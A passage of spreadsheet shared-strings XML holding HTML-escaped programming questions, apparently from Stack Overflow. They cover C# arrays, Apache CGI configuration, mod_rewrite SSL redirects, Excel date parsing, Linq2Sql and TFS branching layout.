new ArraySegment(..).Array returns the original [full] array.  The one below is what I came up with but I feel it's pretty lame.  Is there a better way to do this?&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Program
{
    static void Main(string[] args)
    {
        var arr = new ArraySegment&amp;lt;byte&amp;gt;(new byte[5] { 5, 4, 3, 2, 1 }, 0, 2).ArrayFragment();
        for (int i = 0; i &amp;lt; arr.Length; i++)
            Console.WriteLine(i);
        Console.Read();
    }
}
static class Extensions
{
    public static T[] ArrayFragment&amp;lt;T&amp;gt;(this ArraySegment&amp;lt;T&amp;gt; segment)
    {
        var arr = new T[segment.Count];
        Array.Copy(segment.Array, segment.Offset, arr, 0, segment.Count);
        return arr;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;Update:
The above was just an example.&lt;br /&gt;
I have a method: byte [] CalculateXXX(byte [] key, byte [] message);
I do array manipulations inside this method.  I want to return portion of an array.
ArraySegment does not implement IEnumerable and it does NOT return an array with just the segment new ArraySegment(arr...).Array returns the complete original array.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;&lt;/p&gt;
&lt;p&gt;var rval = new byte[4];
//new ArraySegment(finalOutputBuffer, 0, 4).SegmentedArray();
Array.Copy(finalOutputBuffer, 0, rval, 0, 4);&lt;/p&gt;
&lt;p&gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I find I had to do the above to return a array fragment.  Was just wondering if there's a better way of returning fragments of an array [as new array].&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I handle Security between two Grails apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have two separate Grails apps running on the same app server (Tomcat/Glassfish), how do I allow the user to log into the first app then have him authenticated for the second app so he's not prompted when he goes to that app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fade in each element - one after another</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to find a way to load a JSON page to display my content, which I currently have. But I am trying to fade in each element one after another? Is anyone familiar with a way to do that?&lt;/p&gt;
&lt;p&gt;Fade in each element with a slight delay?&lt;/p&gt;
&lt;p&gt;Here is an example of my code, I am using the jquery framework.&lt;/p&gt;
&lt;p&gt;CODE: &lt;a href="http://pastie.org/343896"&gt;http://pastie.org/343896&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the path to the current template in Joomla 1.5?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a component and would like to insert images from the template folder.&lt;/p&gt;
&lt;p&gt;How do you get the correct path to the template folder?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you use the Apache "ScriptInterpreterSource Registry-Strict" directive?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i run Apache web server on windows in order to work on some Perl CGI scripts. in production these scripts run on a linux box, and in the source code repository they all have shebangs like: &lt;code&gt;#!/usr/bin/perl&lt;/code&gt;, but on my windows machine the shebangs would be &lt;code&gt;#!c:\perl\bin\perl.exe&lt;/code&gt;, so i have a conflict with the source code base.&lt;/p&gt;
&lt;p&gt;enter the Apache &lt;em&gt;ScriptInterpreterSource&lt;/em&gt; directive. &lt;/p&gt;
&lt;p&gt;i've been trying to make it work, based on what i can google. but so far no luck. i have:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;added these things to the appropriate  directive
AllowOverride None&lt;br /&gt;
Options Indexes FollowSymLinks ExecCGI
Order allow,deny
Allow from all
ScriptInterpreterSource Registry-Strict&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;added:
AddHandler cgi-script .cgi    &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;edited my registry and added a new String to &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;blockquote&gt;
&lt;pre&gt;&lt;code&gt;HKEY_CLASSES_ROOT\.cgi\Shell\ExecCGI\Command=C:\Perl\bin\perl.exe
&lt;/code&gt;&lt;/pre&gt;
&lt;/blockquote&gt;
&lt;p&gt;now, i know that CGIs work on this server as long as they have the right shebang. &lt;/p&gt;
&lt;p&gt;but when i try to access a CGI without a shebang the apache log spits out: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;No Exec CGI Verb found for files of
  type '.cgi'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;any thoughts, insights, or even wild-ass guesses would be appreciated. &lt;/p&gt;
&lt;p&gt;thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dired copy asynchronously</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to modify/tell dired to copy files asynchronously?  If you mark multiple files in dired and then use 'C' to copy them, emacs locks up until every file is copied.  I instead want this copy to be started, and for me to continue editing as it goes on in the background.  Is there a way to get this behaviour?&lt;/p&gt;
&lt;p&gt;EDIT: Actually, C calls 'dired-do-copy' in dired-aux, not in dired itself.  Sorry for any confusion.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Deploy ClickOnce application using HttpWebRequest</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to launch my ClickOnce application using C# code with HttpWebRequest class. The application can be deployed fine using IE. But when doing the deployment with my code, it seems only the .application file is downloaded to client.&lt;/p&gt;
&lt;p&gt;My code is as below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        HttpWebRequest getRequest = (HttpWebRequest)WebRequest.Create("http://localhost/test/test.application");
        getRequest.Method = "GET";
        getRequest.Timeout = 500000;                   //default is 100 seconds  
        HttpWebResponse getResponse = (HttpWebResponse)getRequest.GetResponse();
        string loginUrl = getResponse.ResponseUri.AbsoluteUri;
        StreamReader responseReader = new StreamReader(getResponse.GetResponseStream());
        string responseData = responseReader.ReadToEnd();
        responseReader.Close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there anything I'm doing wrong with my code?&lt;/p&gt;
&lt;p&gt;Thanks!
- Bruce&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get SSL+mod_rewrite+Zend Framework MVC working together?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I got ZF MVC site and want to force SSL connection on everything under my /checkout/ 
I tried using mod_rewrite for that, so my .htaccess would look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteEngine on
RewriteRule (\/checkout.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [R] 
RewriteRule !\.(js|ico|gif|jpg|png|css|swf|xml|avi|flv|mov|mp3|wav)$ index.php [L]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sure enough, it does kick in SSL, but second rule, that's ZF specific and redirects everything to index.php sorta erases the protocol specification.&lt;/p&gt;
&lt;p&gt;Unfortunately my level of proficiency with mod_rewrite is stupendously terrible. Maybe someone could help me out to solve this? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get the number of pages in a PDF file in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any Perl script to read multiple PDF files and get the number of pages in it?&lt;/p&gt;
&lt;p&gt;By using PDFlib or pdftet.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to customize date format when creating excel cells through javascript (activexobject)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to convert an HTML table to Excel in Javascript using new &lt;code&gt;ActiveXObject("Excel.application")&lt;/code&gt;. Bascially I loop through table cells and insert the value to the corresponding cell in excel:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//for each table cell
oSheet.Cells(x,y).value = cell.innerText;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that when the cell is in date format of 'dd-mm-yyyy' (e.g. 10-09-2008), excel would read as 'mm-dd-yyyy' (i.e. 09 Oct 2008). I tried to specify &lt;code&gt;NumberFormat&lt;/code&gt; like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;oSheet.Cells(x,y).NumberFormat = 'dd-mm-yyyy';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But it has no effect. It seems that this only affect how excel &lt;strong&gt;display the value, not parse&lt;/strong&gt;. My only solution now is to swap the date like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var txt = cell.innerText;
if(/^(\d\d)-(\d\d)-\d\d\d\d$/.test(txt)) txt = txt.replace(/^(\d\d)-(\d\d)/,'$2-$1');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'm worrying that it is not generic and a differnt machine setting would fail this.&lt;/p&gt;
&lt;p&gt;Is there a way to specific how excel &lt;strong&gt;parse&lt;/strong&gt; the input value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programatically execute a SPAN's Class from DOM Element?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is a .NET program, and I am accessing the &lt;code&gt;HTMLElements&lt;/code&gt; individually.  There are pieces of markup that have a "More..." / "Less..." in a SPAN tag, that when Clicked will show more/less of the preceding content, &lt;/p&gt;
&lt;p&gt;A code snippet:&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;dd&amp;gt;
Product Manager, Business Analysis &amp;amp; Web Design Manager, Global Portals at Dun &amp;amp; Bradstreet
&amp;lt;span class="toggle-show-more"&amp;gt; less...&amp;lt;/span&amp;gt;
&amp;lt;/dd&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The "less.." is click-able, which then invokes something to display less text.  I would like to do the same from an HtmlElement programatically.&lt;/p&gt;
&lt;p&gt;And, some Command window output from Visual Studio:  &lt;/p&gt;
&lt;p&gt;OuterHtml: "&lt;/p&gt;
&lt;pre class="lang-html prettyprint-override"&gt;&lt;code&gt;&amp;lt;DD collapsed="False"&amp;gt;Product Manager, Business Analysis &amp;amp;amp; Web Design Manager, Global Portals at Dun &amp;amp;amp; Bradstreet "
OuterText: "Product Manager, Business Analysis &amp;amp; Web Design Manager, Global Portals at Dun &amp;amp; Bradstreet "
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried: &lt;code&gt;elem.RaiseEvent("onlick")&lt;/code&gt; and toggling the "collapsed" attribute.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set selected index of dropdown to 0 when text of textbox is changed?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a dropdown to populate a textbox. But if preferred value is not present in dropdown then user directaly enter value in that textbox. &lt;/p&gt;
&lt;p&gt;If user selects value from dropdown first and then he don't want that value and he types another text in that textbox then at this time the dropdown should be set to index 0 as user is typing another value.&lt;/p&gt;
&lt;p&gt;I used textchanged event of textbox but it is not working. Can anyone tell me how to write javascript for this?
Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to force a redraw of my application's entry in the taskbar?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Windows form application written in C#.  I update the title of the form frequently, but there's a substantial lag between the title changing and the title dislayed in the taskbar being updated.  &lt;/p&gt;
&lt;p&gt;What's a clean way to force an update / redraw of the task bar's entry for my program?  Failing that, how can I force a redraw of the entire task bar?&lt;/p&gt;
&lt;p&gt;Elaboration: It turns out that the delay in updating the taskbar is fixed at about 100ms, however this seems to be a delay based on when the Form.Text was last modified.  If you modify the text faster then that - say, every 10ms, the taskbar is not updated until the Form.Text has been left unchanged for at least ~100ms.&lt;/p&gt;
&lt;p&gt;OS: Vista 32.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I respond to mouse clicks on sprites in PyGame?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the canonical way of making your sprites respond to mouse clicks in PyGame ? &lt;/p&gt;
&lt;p&gt;Here's something simple, in my event loop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for event in pygame.event.get():
    if event.type == pygame.QUIT:
        exit_game()
    [...]
    elif (  event.type == pygame.MOUSEBUTTONDOWN and
            pygame.mouse.get_pressed()[0]):
        for sprite in sprites:
            sprite.mouse_click(pygame.mouse.get_pos())
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Some questions about it:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is this the best way of responding to mouse clicks ? &lt;/li&gt;
&lt;li&gt;What if the mouse stays pressed on the sprite for some time ? How do I make a single event out of it ?&lt;/li&gt;
&lt;li&gt;Is this a reasonable way to notify all my sprites of the click ?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Server session</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;if I open a connection to the server from firefox browser, and then I open a new tab within the same instance of browser to make a connection to the server, is it considered one session to server or considered as two diff sessions?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speeding up text output on Windows, for a console</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We  have an application that has one or more text console windows that all essentially represent serial ports (text input and output, character by character).  These windows have turned into a major performance problem in the way they are currently code... we manage to spend a very significant chunk of time in them.&lt;/p&gt;
&lt;p&gt;The current code is structured by having the window living its own little life, and the main application thread driving it across "SendMessage()" calls.  This message-passing seems to be the cause of incredible overhead. Basically, having a detour through the OS feels to be the wrong thing to do.&lt;/p&gt;
&lt;p&gt;Note that we do draw text lines as a whole where appropriate, so that easy optimization is already done. &lt;/p&gt;
&lt;p&gt;I am not an expert in Windows coding, so I need to ask the community if there is some other architecture to drive the display of text in a window than sending messages like this?  It seems pretty heavyweight.&lt;/p&gt;
&lt;p&gt;Note that this is in C++ or plain C, as the main application is a portable C/C++/some other languages program that also runs on Linux and Solaris.&lt;/p&gt;
&lt;p&gt;We did some more investigations, seems that half of the overhead is preparing and sending each message using SendMessage, and the other half is the actual screen drawing. The SendMessage is done between functions in the same file...&lt;/p&gt;
&lt;p&gt;So I guess all the advice given below is correct:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Look for how much things are redrawn&lt;/li&gt;
&lt;li&gt;Draw things directly &lt;/li&gt;
&lt;li&gt;Chunk drawing operations in time, to not send every character to the screen, aiming for 10 to 20 Hz update rate of the serial console.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Can you accept ALL answers?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to connect to a Oracle Database from Web Services Published on IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The situation is this:&lt;br /&gt;
1. Oracle database 10g on one server. Configured to accept connections.&lt;br /&gt;
2. Web service on different server (IIS), connecting to the database. This doesn't work.&lt;br /&gt;
3. Same web services running on the VS 2005 web server, work without a problem and can connect to the database. &lt;/p&gt;
&lt;p&gt;The problem:
Do not know what is the issue with web services published on IIS in respect to connect to Oracle 10g when the same services, running on VS 2005 web server work without the problem.&lt;/p&gt;
&lt;p&gt;Error returned: Oracleclient connection timedout.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use PhotoLibrary without jailbreak</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is nice thing you have done. Could you please explain: How to use PhotoLibrary's CameraController without jailbreak. Actually I 've downloaded class-dump and tried dumping PhotoLibrary but did not work out well. It is giving: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/*
 *     Generated by class-dump 3.1.2.
 *
 *     class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve Nygard.
 */
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This file does not contain any Objective-C runtime information.&lt;/p&gt;
&lt;p&gt;So, I wanted to know how to dump it and use it in xcode.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegEx and matching codes right to left</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Stuggling a little bit with the RegEx, I've got 4 codes in a string&lt;/p&gt;
&lt;p&gt;CODE4:CODE3:CODE2:CODE1&lt;/p&gt;
&lt;p&gt;each code is optional apart from CODE1&lt;/p&gt;
&lt;p&gt;So I could have ab:bc:de:fg&lt;/p&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;p&gt;bc::fg&lt;/p&gt;
&lt;p&gt;of &lt;/p&gt;
&lt;p&gt;ab:::fg&lt;/p&gt;
&lt;p&gt;In each case of the above CODE1 = fg dnd for the dear life of me I can't work out the RegEX&lt;/p&gt;
&lt;p&gt;Would be easy to do as a standard string parse, but unforunatly because of buisness objects in needs to be done via regex :-( and return via a vb.net RegEX.matche,groups("Code1") fg (I hope that makes sense)&lt;/p&gt;
&lt;p&gt;Thanks in advance for any help&lt;/p&gt;
&lt;p&gt;Ended up with a bit of RegEx that does the job, bit messy but it works&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(^(?&amp;lt;code1&amp;gt;[\w]*)$)|(^(?&amp;lt;code2&amp;gt;[\w]*):(?&amp;lt;code1&amp;gt;[\w]*)$)|(^(?&amp;lt;code3&amp;gt;[\w]*):(?&amp;lt;code2&amp;gt;[\w]*):(?&amp;lt;code1&amp;gt;[\w]*)$)|(^(?&amp;lt;code4&amp;gt;[\w]*):(?&amp;lt;code3&amp;gt;[\w]*):(?&amp;lt;code2&amp;gt;[\w]*):(?&amp;lt;code1&amp;gt;[\w]*)$)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Ta all&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq2Sql: Manage DataContext</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the following code doesn't work as &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void Foo()
{
   CompanyDataContext db = new CompanyDataContext();
   Client client = (select c from db.Clients ....).Single();
   Bar(client);
}
public void Bar(Client client)
{
   CompanyDataContext db = new CompanyDataContext();
   db.Client.Attach(client);
   client.SomeValue = "foo";
   db.SubmitChanges();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doens't work, I get error msg. "An attempt has been made to Attach or Add an entity that is not new, perhaps having been loaded from another DataContext.  This is not supported."&lt;/p&gt;
&lt;p&gt;How do you work with DataContexts throughout an application so you don't need to pass around a reference? &lt;/p&gt;
&lt;p&gt;What&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pixel level 2D Graphics in Silverlight</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to port a WebForms app to Silverlight, this application is using the GDI Graphics class to draw polygons to a in-memory bitmap, it will then do pixel by pixel comparisons so I need access to the pixel buffer.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;
    Graphics g = Graphics.FromImage(bmp);
    g.FillClosedCurve(brush, points, FillMode.Winding);
&lt;/pre&gt;
&lt;p&gt;I have done some serious googling trying to figure out how to draw polygons and then be able to access the pixel buffer of the canvas surface. My findings indicate that this is not possible with the WPF silverlight graphics, so I need to use a custom graphics library but have only found some 3D libraries. Is there a simple 2D library for silverlight or should I just go a head and write a polygon render algorithm myself? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python: single instance of program</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a Pythonic way to have only one instance of a program running? &lt;/p&gt;
&lt;p&gt;The only reasonable solution I've come up with is trying to run it as a server on some port, then second program trying to bind to same port - fails. But it's not really a great idea, maybe there's something more lightweight than this?  &lt;/p&gt;
&lt;p&gt;(Take into consideration that program is expected to fail sometimes, i.e. segfault - so things like "lock file" won't work)&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Update&lt;/b&gt;: the solutions offered are much more complex and less reliant than just having a port occupied with a non-existent server, so I'd have to go with that one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Network interface settings in embedded Windows XP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can we get the network interface name (i.e. the one that appears in the "Network connections" dialog) given the device description (i.e. the string that appears in the "Device Properties -&gt; Connect using:" textbox)?&lt;/p&gt;
&lt;p&gt;We must do it in pure C/C++ language, or through some of the standard command line tools (e.g. netsh, ipconfig...), or a combination of both.&lt;/p&gt;
&lt;p&gt;We CAN'T use the .NET API, because of deployment problems (the application must run on an XP embedded without .NET Framework).&lt;/p&gt;
&lt;p&gt;The SDK API GetIfTable and GetIfEntry seem promising, but on our system all the MIB_IFROW fields are filled correctly, except the "wszName" one, that remains uninitialized.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Session not reinitialized after timeout?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this classic ASP site which has been working fine until we updated it. It was just a site-update, meaning .asp files which ran fine in our test enviroment, no service packs or patches. I can not reproduce the error at all on a test-site on the same server.&lt;/p&gt;
&lt;p&gt;The system it's running on is IIS6 on Server 2003.&lt;/p&gt;
&lt;p&gt;Somehow, it has now started to behave weird when a user revisit the site with an old session-cookie, which makes the site not running Session_OnStart() again. &lt;/p&gt;
&lt;p&gt;Since the session is long gone, it leaves me with an empty Session()-scope, which breaks a lot of code on the site.&lt;/p&gt;
&lt;p&gt;I have never seen this behaviour before, since I would assume that visiting a site with an old session-cookie would retrigger Session_OnStart?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Team Foundation Server Source Control Structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been working on standardizing the source control structure for our Team Foundation Server rollout for the new year.  I have started by using the &lt;a href="http://www.codeplex.com/BranchingGuidance"&gt;Microsoft Team Foundation Server Branching Guidance&lt;/a&gt; documentation available on CodePlex.&lt;/p&gt;
&lt;p&gt;I was hoping to get some feedback and answers to a few of the specific questions I have about the proposed structure.  When it comes to structuring source control in TFS, I have learned that there are so many "standards" to choose from that there is not really a standard.&lt;/p&gt;
&lt;p&gt;First, I will outline and describe the decisions and usage.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$/                                                
    {Team Project}/                               
        {Subproject}/                             
            Development/                          
                Trunk/                            
                    Source/
                    Tests/
                    Sandcastle/
                    TeamBuildTypes/
                        {Build Name}/
                Branches/
                    {Branch Name}/
                        Source/
                        Tests/
                        Sandcastle/
                        TeamBuildTypes/
                            {Build Name}/
            Integration/
                Source/
                Tests/
                Sandcastle/
                TeamBuildTypes/
                    {Build Name}/
            Production/
                Releases/
                    {Release Version}/
                        Source/
                        Tests/
                        Sandcastle/
                        TeamBuildTypes/
                            {Build Name}/
                Branches/
                    {Branch Name}/
                        Source/
                        Tests/
                        Sandcastle/
                        TeamBuildTypes/
                           {Build Name}/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The general logic is that a Team Project can contain either a single logical project (where there would be no &lt;code&gt;{Subproject}&lt;/code&gt; entry) or multiple related projects in the form of a product or tool suite.  The three major containers are called &lt;code&gt;Development&lt;/code&gt;, &lt;code&gt;Integration&lt;/code&gt;, and &lt;code&gt;Production&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Within the &lt;code&gt;Development&lt;/code&gt; container's Trunk, there are provisions for both the projects which make up the product in the &lt;code&gt;Source&lt;/code&gt; folder, with corresponding unit tests available in the &lt;code&gt;Tests&lt;/code&gt; folder.  A majority of minor development would occur in the trunk, with branching available through the &lt;code&gt;Trunk&lt;/code&gt; folder's sibling &lt;code&gt;Branches&lt;/code&gt; folder, which acts as a branching container.  One or more solution files would live within the &lt;code&gt;Trunk&lt;/code&gt;, allowing for branches at that level to capture the solution, source, and unit tests.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;Integration&lt;/code&gt; container, often called "main" in non-TFS implementation, is solely used to integrate Changesets from &lt;code&gt;Development&lt;/code&gt; to create a stable and testable build.  It is initially created as a branch from the &lt;code&gt;Development&lt;/code&gt; container once a testable product has been attained.  The builds from this container will be used for our testing environment and load testing environment.  We choose to include load testing with testable builds so that we can monitor for changes in performance, being able to rapidly isolate Changesets that may have contributed to any irregularities.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Production&lt;/code&gt; is used to produce pre-production and production quality builds.  It is initially created as a branch from the &lt;code&gt;Integration&lt;/code&gt; container once a stable build has been recommended for release.  Within the &lt;code&gt;Releases&lt;/code&gt; folder, a "branch by release" structure is followed, providing snapshotting and isolation in a single place.  (For example, when &lt;code&gt;Release 1.1&lt;/code&gt; is ready for a pre-production build, the stable &lt;code&gt;Integration&lt;/code&gt; container is branched into a new &lt;code&gt;Release 1.1&lt;/code&gt; folder in the &lt;code&gt;Production/Releases&lt;/code&gt; structure.  Subsequent RCs and RTWs/RTMs are promoted into this folder, as well.)  A branching structure is also present, as seen in the &lt;code&gt;Branches&lt;/code&gt; container.  This allows for "hotfixes", usually a revision marker (Major.Minor.Revision).  The branch is created from the current release and merged back into the new revision marker - like &lt;code&gt;Release 1.1.1&lt;/code&gt;.  The Changeset would be reverse integrated to the &lt;code&gt;Development&lt;/code&gt; container's &lt;code&gt;Trunk&lt;/code&gt; upon acceptance.&lt;/p&gt;
&lt;p&gt;We feel that this structure is a fair balance between robustness and complexity.  But there are a few nagging questions that I can not logically fit into the model.  They are:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Team Build&lt;/strong&gt; - The &lt;code&gt;Development&lt;/code&gt; and &lt;code&gt;Integration&lt;/code&gt; containers will initially start out as being nightly builds, eventually moving to Continuous Integration (CI).  The Production container will be manually built.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;del&gt;Where should the build definitions live?&lt;/del&gt; &lt;strong&gt;Edit - Based upon a couple of responses, the TeamBuildTypes folder has been moved to the trunk and branched to the appropriate containers.  This does, however, lead to a new question (follows).&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;By having the TeamBuildTypes folder in their appropriate containers, does that mean that all build definitions will be reproduced between the appropriate folders?  For example, having a build definition for development quality builds, as well as testable builds, etc. all living in all TeamBuildType folders throughout the structure.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Documentation Generation&lt;/strong&gt; - We use Sandcastle to generate documentation.  Specifically, we also use &lt;a href="http://www.codeplex.com/SHFB"&gt;Sandcastle Help File Builder&lt;/a&gt; to manage the output.  This produces a project file in a format specific to SFHB.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Should generated documentation be stored in the source control structure?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Should documentation be generated for each container, or does it only posses value for pre-production and production quality builds?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;To preserve fast local build times, should documentation creation be owned by a build definition?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;del&gt;Where should the SHFB-specific files live?  My initial inkling is to put it as a peer to the &lt;code&gt;Source&lt;/code&gt; and &lt;code&gt;Tests&lt;/code&gt; folders.&lt;/del&gt; &lt;strong&gt;&lt;em&gt;I agree with the recommondations that it be a peer to &lt;code&gt;Source&lt;/code&gt; and &lt;code&gt;Tests&lt;/code&gt;.  Diagram changed to reflect this change.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Third Party Binaries&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;Should binaries (controls, libraries, etc.) be stored in source control?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If so, should it be it's own Team Project?&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;General Documentation&lt;/strong&gt; - Non-generated documentation, such as requirements, design documents, test plans, etc. are not going to be reflected by a folder in the source control structure.  After some research and discussion with my developers and peers, using the built-in Documents folder in Team Explorer provides more benefit, since it mirrors the structure within the Team Project Portal and some (business) users do not need the additional complexity of learning the source control aspect of TFS.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I will update the structure as I get answers to the questions to provide a clearer picture.  I also welcome any other comments related to potential changes.  If I have any other questions, I will make sure to modify this post.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edits:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Clarification.  &lt;code&gt;Source&lt;/code&gt; and &lt;code&gt;Tests&lt;/code&gt; folders do live under the &lt;code&gt;Integration&lt;/code&gt; container, as well.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Both Micah and Josh brought up great points regarding third party binaries.  Question added regarding the issue.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Documentation generation can be slow.  Question added regarding whether documentation creation should be owned by a specific Team Build Type.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Added resolution related to non-generated documentation, such as requirements, design documents, test plans, etc.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Added resolution related to TeamBuildTypes folder for build defintions.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Based upon various feedback, moved the TeamBuildTypes folder to the trunk / branch levels.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC localization best practice?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need help with the best practice to localize asp mvc apps,
I saw Oxite having a base method named Localize in the BaseController, but is the Localization a task for the view or the Controller?
Or should I use resx files / or use db tables?&lt;/p&gt;
</t>
  </si>
  <si>
